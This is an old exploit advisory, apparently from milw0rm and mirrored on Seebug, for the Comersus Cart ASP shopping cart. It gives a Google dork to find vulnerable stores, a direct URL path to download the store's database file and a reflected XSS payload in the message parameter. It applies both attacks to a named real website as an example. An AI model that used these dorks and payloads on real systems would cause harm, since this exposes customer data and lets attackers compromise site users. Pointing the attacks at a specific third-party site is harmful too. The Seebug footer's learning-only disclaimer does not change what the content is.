000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 [+] Script : Comersus Cart [+] Exploit Type : Multiple Exploits (XSS + remote database disclosure) [+] Script's Homepage : http://comersus.com [+] Google Dork : inurl:.asp? Powered by Comersus ASP Shopping Cart [+] Contact : blackbeard-sql@hotmail.fr --//--> Exploit : 1) Remote Database Disclure : http://[website]/[script]/database/commersus.mdb 2) Remote XSS exploit : In simple words : http://[website]/[script]/comersus_message.asp?message=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ] [Peace xD ] //Example for str0ke : https://www.tarkentonsports.com/Comersus/database/comersus.mdb https://www.tarkentonsports.com/Comersus/store/comersus_message.asp?message=%3Cscript%3Ealert(%27Bl@ckbe@rD%20is%20not%20dead%20yet%27)%3C/script%3E[Peace%20xD%20] # milw0rm.com [2008-11-27]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论